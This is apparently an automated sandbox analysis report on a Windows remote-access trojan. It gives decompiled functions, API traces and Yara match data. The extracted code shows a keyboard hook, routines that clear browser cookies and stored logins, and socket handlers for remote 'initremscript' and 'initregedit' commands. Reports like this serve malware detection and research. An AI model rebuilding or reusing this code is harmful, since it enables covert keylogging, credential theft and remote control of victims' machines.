                                          • Instruction ID: fd0eb6cd70df32150fd7f84368215a10c343f41110055329f562a51080181c44
                                          • Opcode Fuzzy Hash: b547f61fa1d04b115500ff6018a40232aa2c76acc4097e1a31bcc498f6059ffc
                                          • Instruction Fuzzy Hash: A0E0E571AC0218ABD20073A46D4BFEE3B18FA91705F404672FA02711D1EAFC18D882AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 43%
                                          			E0040EE4B(void* __eax, intOrPtr _a4, void* _a8, char _a11) {
                                          				char _v20;
                                          				void* _t15;
                                          				void* _t18;
                                          				signed int _t20;
                                          				void* _t22;
                                          				void* _t26;
                                          				signed int _t29;
                                          				signed int _t30;
                                          				signed int _t37;
                                          				void* _t47;
                                          				signed int _t58;
                                          				void* _t59;
                                          
                                          				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          				_t58 = __eax + 2;
                                          				_t15 = _t58 + _t58;
                                          				L0040FCCC();
                                          				_t26 = _t15;
                                          				_t29 = _t58;
                                          				_t47 = _t26;
                                          				_t30 = _t29 >> 2;
                                          				_t18 = memset(_t47 + _t30, memset(_t47, 0, _t30 << 2), (_t29 & 0x00000003) << 0);
                                          				_t6 = _t58 - 2; // 0x0
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t15);
                                          				_t59 = _t18;
                                          				_t37 = _t6 >> 2;
                                          				_t20 = memcpy(_t26, _t59, _t37 << 2);
                                          				_t22 = memcpy(_t59 + _t37 + _t37, _t59, _t20 & 0x00000003);
                                          				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t26,  &_a11);
                                          				E0040FC2C(_t22, _t26);
                                          				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z( &_v20);
                                          				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				return _a4;
			}

                                          APIs
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,7313CB00,7313CB00,?,0040C5C2,?,00000000), ref: 0040EE57
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EE65
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,0040C5C2,?,00000000), ref: 0040EE87
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,0040C5C2,?,00000000), ref: 0040EEA9
                                            • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,0040C5C2,?,00000000), ref: 0040EEBD
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040C5C2,?,00000000), ref: 0040EEC6
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@free
                                          • String ID:
                                          • API String ID: 1231779380-0
                                          • Opcode ID: 8d267b30505027ac71a5795a797b7f15db73b80b7f14e4256d31203b5d1ac008
                                          • Instruction ID: b993cd5d2c3ead3800f1df18077c746f948359e482093e15d73946b3c0281b93
                                          • Opcode Fuzzy Hash: 8d267b30505027ac71a5795a797b7f15db73b80b7f14e4256d31203b5d1ac008
                                          • Instruction Fuzzy Hash: 8F01803220011D9BCB18EB78EC998EF77AAFB88265740443DF907D7290EE709D45CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 41%
                                          			E00405E72(void* __ecx) {
                                          				char _v5;
                                          				char _v6;
                                          				char _v7;
                                          				char _v8;
                                          				char _v9;
                                          				void* _t33;
                                          				intOrPtr _t65;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				 *0x41576a = 1;
                                          				Sleep( *0x415764);
                                          				_v5 = 0;
                                          				_v6 = 0;
                                          				_v7 = 0;
                                          				_v9 = 0;
                                          				_v8 = 0;
                                          				do {
                                          					if(_v5 == 0) {
                                          						L2:
                                          						_v5 = E00405D53();
                                          					}
                                          					if(_v6 == 0) {
                                          						_v6 = E00405AFB();
                                          					}
                                          					if(_v9 == 0) {
                                          						_v9 = E004057B6();
                                          					}
                                          					if(_v7 == 0) {
                                          						_v7 = E004056EC();
                                          					}
                                          					if(_v8 == 0) {
                                          						_v8 = E00405622();
                                          					}
                                          					if(_v5 == 0 || _v6 == 0 || _v7 == 0 || _v8 == 0 || _v9 == 0) {
                                          						Sleep(0x1388);
                                          					}
                                          					if(_v5 == 0) {
                                          						goto L2;
                                          					}
                                          				} while (_v6 == 0 || _v7 == 0 || _v8 == 0 || _v9 == 0);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("\n[Cleared all cookies & stored logins!]\n",  &_v9, 0);
                                          				_t33 = E00403A9A(0x4156c0);
                                          				_t65 =  *0x415760; // 0x0
                                          				if(_t65 != 0) {
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					E00409046(0x80000001, _t33, "FR", 1);
                                          				}
                                          				 *0x41576a = 0;
                                          				return 0;
                                          			}

                                          APIs
                                          • Sleep.KERNEL32 ref: 00405E8C
                                          • Sleep.KERNEL32(00001388), ref: 00405EFE
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared all cookies & stored logins!],?), ref: 00405F28
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410D48,00000001), ref: 00405F4C
                                            • Part of subcall function 00405D53: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 00405D64
                                            • Part of subcall function 00405D53: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00405D8B
                                            • Part of subcall function 00405D53: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405D94
                                            • Part of subcall function 00405D53: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00405DA3
                                            • Part of subcall function 00405D53: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],?), ref: 00405E1A
                                            • Part of subcall function 00405D53: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405E67
                                          Strings
                                          • [Cleared all cookies & stored logins!], xrefs: 00405F23
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                                          • String ID: [Cleared all cookies & stored logins!]
                                          • API String ID: 3797260644-1894301085
                                          • Opcode ID: f199ca515fe3fd297484eb2075cc4a307752a8c1ca9959e62230d6bf913dfe67
                                          • Instruction ID: 743c0b0ad3dce683d62215772fc1dcfb9b2edba61c8a76df2461d73b0dcd023a
                                          • Opcode Fuzzy Hash: f199ca515fe3fd297484eb2075cc4a307752a8c1ca9959e62230d6bf913dfe67
                                          • Instruction Fuzzy Hash: 8F31F461D4A7C8B9EB12E3F555165DF7E748E12200B48C4FFD4C077283D57A0B48976A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E0040F978() {
                                          				char _v20;
                                          				struct _WNDCLASSEXA _v68;
                                          				struct HWND__* _t21;
                                          				signed int _t23;
                                          
                                          				_t23 = 0xb;
                                          				memset( &(_v68.style), 0, _t23 << 2);
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsw");
                                          				_v68.cbSize = 0x30;
                                          				asm("movsb");
                                          				_v68.lpszClassName =  &_v20;
                                          				_v68.style = 0;
                                          				_v68.lpfnWndProc = E0040F9EF;
                                          				_v68.cbClsExtra = 0;
                                          				_v68.cbWndExtra = 0;
                                          				_v68.lpszMenuName = 0;
                                          				if(RegisterClassExA( &_v68) == 0) {
                                          					L3:
                                          					return 0;
                                          				}
                                          				_t21 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
                                          				if(_t21 == 0) {
                                          					GetLastError();
                                          					goto L3;
                                          				}
                                          				return _t21;
                                          			}

                                          APIs
                                          • RegisterClassExA.USER32(00000030), ref: 0040F9BE
                                          • CreateWindowExA.USER32 ref: 0040F9D9
                                          • GetLastError.KERNEL32(?,00000000), ref: 0040F9E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ClassCreateErrorLastRegisterWindow
                                          • String ID: 0$MsgWindowClass
                                          • API String ID: 2877667751-2410386613
                                          • Opcode ID: 4b35dbec49bb3aac694837bfd24467ddf9e7bcdb7fb055d8e4ccf1cf56f59604
                                          • Instruction ID: 3bd77cc2a02a113e4efc25ff9f0a79e0b482d680b5cc203598e7dfc1cb382988
                                          • Opcode Fuzzy Hash: 4b35dbec49bb3aac694837bfd24467ddf9e7bcdb7fb055d8e4ccf1cf56f59604
                                          • Instruction Fuzzy Hash: 93015AB1D01228AACB21DF96EC48ADFBFBDEF45760F004126F510B6280D7B05549CBE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 17%
                                          			E0040D18E(void* __eflags, char _a4) {
                                          				char _v20;
                                          				char* _t8;
                                          				void* _t10;
                                          				void* _t21;
                                          
                                          				E00402109(0x415a78);
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				E00402168(0x415a78);
                                          				_t8 =  &_v20;
                                          				L0040FC1A();
                                          				L0040FC14();
                                          				E00402198(0x415a78, _t21);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t8, _t8, "initremscript", 0x415268,  &_a4);
                                          				_t10 = E0040221C(0x415a78, E0040D3A5, 1);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t10;
                                          			}

                                          APIs
                                            • Part of subcall function 00402109: socket.WS2_32(00000000,00000001,00000006), ref: 00402120
                                            • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,initremscript,00415268,?,?,?,?,?,?,?,?,?,?,?,?,0040BC44), ref: 0040D1CF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040D1D9
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040D1EB
                                            • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00415A30,00415940,00415268,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E), ref: 0040222E
                                            • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040223B
                                            • Part of subcall function 0040221C: malloc.MSVCRT ref: 00402248
                                            • Part of subcall function 0040221C: recv.WS2_32(00415A30,00000000,00000000,00000000), ref: 00402259
                                            • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040226D
                                            • Part of subcall function 0040221C: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402277
                                            • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402280
                                            • Part of subcall function 0040221C: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040228D
                                            • Part of subcall function 0040221C: free.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022AE
                                            • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D0
                                            • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040D3A5,00000001,?,?,?,?,?,?), ref: 0040D202
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V?$basic_string@$??4?$basic_string@V10@0@V10@@Y?$basic_string@connectfreemallocrecvsocket
                                          • String ID: initremscript
                                          • API String ID: 1984283922-2453072461
                                          • Opcode ID: a3a1c512a8bbe3034cfa995716c64fccf3b81a4b27426af285bb25f05ea61ccc
                                          • Instruction ID: 342a5ca8b5c7f20c834f884bab2930fb133c27a797bcc57ebff7080bfdc51c0c
                                          • Opcode Fuzzy Hash: a3a1c512a8bbe3034cfa995716c64fccf3b81a4b27426af285bb25f05ea61ccc
                                          • Instruction Fuzzy Hash: F5F0A432B4061463D700FAB99D8B9FF7759AA81354B40097EBE016A1C2EAFD9A4C429D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 17%
                                          			E00409D91(void* __eflags, char _a4) {
                                          				char _v20;
                                          				char* _t8;
                                          				void* _t10;
                                          				void* _t21;
                                          
                                          				E00402109(0x4159a8);
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				E00402168(0x4159a8);
                                          				_t8 =  &_v20;
                                          				L0040FC1A();
                                          				L0040FC14();
                                          				E00402198(0x4159a8, _t21);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t8, _t8, "initregedit", 0x415268,  &_a4);
                                          				_t10 = E0040221C(0x4159a8, E0040976B, 0);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t10;
                                          			}

                                          APIs
                                            • Part of subcall function 00402109: socket.WS2_32(00000000,00000001,00000006), ref: 00402120
                                            • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,initregedit,00415268,?,?,?,?,?,?,?,?,?,?,?,?,0040BC72), ref: 00409DD2
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00409DDC
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00409DEE
                                            • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00415A30,00415940,00415268,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E), ref: 0040222E
                                            • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040223B
                                            • Part of subcall function 0040221C: malloc.MSVCRT ref: 00402248
                                            • Part of subcall function 0040221C: recv.WS2_32(00415A30,00000000,00000000,00000000), ref: 00402259
                                            • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040226D
                                            • Part of subcall function 0040221C: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402277
                                            • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402280
                                            • Part of subcall function 0040221C: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040228D
                                            • Part of subcall function 0040221C: free.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022AE
                                            • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D0
                                            • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040976B,00000000,?,?,?,?,?,?), ref: 00409E05
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V?$basic_string@$??4?$basic_string@V10@0@V10@@Y?$basic_string@connectfreemallocrecvsocket
                                          • String ID: initregedit
                                          • API String ID: 1984283922-4282871991
                                          • Opcode ID: f30660b3cfbb667e63d0ae3de9153243f20a977a78a5d049d9f4742b7f6f2b8b
                                          • Instruction ID: ea2ab50fb2608594d56e05149f15f1d9e9310a7c1248ba924dfbe77ee24fa733
                                          • Opcode Fuzzy Hash: f30660b3cfbb667e63d0ae3de9153243f20a977a78a5d049d9f4742b7f6f2b8b
                                          • Instruction Fuzzy Hash: E3F0F93260060467C700BA759D4B9EF77189A81314B40047EBD01BB1C3EAFC8D48429D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,?,dt@,00000000), ref: 00402A40
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402A4C
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402A61
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402A6A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                          • String ID: dt@
                                          • API String ID: 2505548081-2366654348
                                          • Opcode ID: 61a749066b2d00b9c9c648641962aeee84050e9aec5808d4299b9fd5b26a7e54
                                          • Instruction ID: 764d4db823161b876fc7299956acb260e9b2acb34382fd8d294e8e186b4e9337
                                          • Opcode Fuzzy Hash: 61a749066b2d00b9c9c648641962aeee84050e9aec5808d4299b9fd5b26a7e54
                                          • Instruction Fuzzy Hash: B7F0D43150001EEBCF04EF94DC98CEE7B78FB54305B008469B916921A0EBB4AA59CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00403774(void* __ecx, char _a4) {
                                          				void* _t8;
                                          				void* _t16;
                                          
                                          				_t16 = __ecx;
                                          				 *((char*)(__ecx + 0x38)) = 1;
                                          				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_a4);
                                          				E0040374A(__ecx);
                                          				CreateThread(0, 0, E0040382C, __ecx, 0, 0);
                                          				if( *_t16 == 0) {
                                          					CreateThread(0, 0, E0040380C, _t16, 0, 0);
                                          				}
                                          				_t8 = CreateThread(0, 0, E0040383B, _t16, 0, 0);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t8;
                                          			}

                                          Instruction addresses: 0x00403779, 0x00403783, 0x00403787, 0x0040378f, 0x004037a6, 0x004037aa, 0x004037b6, 0x004037b6, 0x004037c2, 0x004037c7, 0x004037d1

                                          APIs
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B043E0,00000000,00415940,?,00407B0B,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00403787
                                            • Part of subcall function 0040374A: GetKeyboardLayout.USER32 ref: 0040374F
                                          • CreateThread.KERNEL32 ref: 004037A6
                                          • CreateThread.KERNEL32 ref: 004037B6
                                          • CreateThread.KERNEL32 ref: 004037C2
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00407B0B,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004037C7
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??4?$basic_string@KeyboardLayoutV01@V01@@
                                          • String ID:
                                          • API String ID: 2295282396-0
                                          • Opcode ID: 14f04f78e8f7430bc4bd69958249ffd5d817d18415e9be8f89f862f13594ae1e
                                          • Instruction ID: 83acec77044f58d1f3a1298fcc2b8004ba63f5c21448a1edded433463e12b57e
                                          • Opcode Fuzzy Hash: 14f04f78e8f7430bc4bd69958249ffd5d817d18415e9be8f89f862f13594ae1e
                                          • Instruction Fuzzy Hash: 46F090721002947AC231AB239C8CDEB3FBCDAD7F65710807EF44612181CAB89945C2B9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040388F
                                          • SetWindowsHookExA.USER32 ref: 0040389D
                                          • GetMessageA.USER32 ref: 004038B2
                                          • TranslateMessage.USER32(?), ref: 004038BC
                                          • DispatchMessageA.USER32 ref: 004038C6
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Message$DispatchHandleHookModuleTranslateWindows
                                          • String ID:
                                          • API String ID: 521483645-0
                                          • Opcode ID: 9f2d6cb336974f6d21199ad434600dc08e561f79de4f796117326006807f6229
                                          • Instruction ID: 353822e126b8fa7368d95cd0bef129b561c7f90acebca083c61d1e8d62fd4680
                                          • Opcode Fuzzy Hash: 9f2d6cb336974f6d21199ad434600dc08e561f79de4f796117326006807f6229
                                          • Instruction Fuzzy Hash: 7CF04473900149BBD720AFA59C48DEB7FFCEBC5B11B00847ABA41E2154D6789545CB74
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040EF60
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040EF72
                                          • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0040EF7E
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040EF9F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EFA8
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                                          • String ID:
                                          • API String ID: 1435062097-0
                                          • Opcode ID: 20075cc94b158e45fadc6d86183d5be30a195f63fcca5debc30167b5daaf2194
                                          • Instruction ID: 6b6ba2759fc20d09fe660d68a9c76a1e637e25a4b848d32c772961ab34e95e59
                                          • Opcode Fuzzy Hash: 20075cc94b158e45fadc6d86183d5be30a195f63fcca5debc30167b5daaf2194
                                          • Instruction Fuzzy Hash: CE019E7540015AEFCB008F64DC889EE7BB8FF48314F008455EC5697280DA749A44CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403701
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040370E
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040371B
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403728
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403735
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                          • String ID:
                                          • API String ID: 4257247948-0
